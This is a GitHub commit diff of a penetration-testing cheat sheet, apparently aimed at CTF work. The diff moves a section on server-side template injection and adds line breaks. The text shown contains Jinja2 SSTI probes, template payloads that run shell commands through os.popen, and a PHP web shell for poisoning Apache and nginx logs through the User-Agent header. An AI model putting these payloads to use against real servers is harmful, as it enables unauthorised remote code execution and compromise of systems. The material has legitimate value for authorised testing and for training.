Update Cheat Sheet.md

This commit is contained in:
ARZ 2021-09-03 20:22:23 +05:00 committed by GitHub
parent 917a58e08a
commit 27ee251542
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -509,19 +509,6 @@ Virutal Hosts file : `/etc/apache2/sites-available/000-default.conf`<br/>
If we can read log files,we can poison them to get RCE<br />
### SSTI (Server Side Template Injection)
#### Jinja2
To check if it's jinja test`{{7*'7'}}` this would return 7777
Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/>
`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}`
**Exploit**
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
#### For Apache2
For apache `/var/log/apache2/access.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>`in User-agent<br/>
@ -530,6 +517,19 @@ For apache `/var/log/apache2/access.log` try to access the log and if we can the
For niginx `/var/log/nginx/error.log` try to access the log and if we can then add `<?php system($_GET['c']); ?>` in User-agent or try to add it in a file having a paramter make sure it's not being url encoded <br/>
### SSTI (Server Side Template Injection)
#### Jinja2
To check if it's jinja test`{{7*'7'}}` this would return 7777
Check for `{{4*4}}` on the url `http://IP/{{4*4}}` if it returns "16" as a result it is vulnerable to SSTI <br/>
`{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}`<br/>
**Exploit**<br/>
`{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}`
### XSS Session Hijacking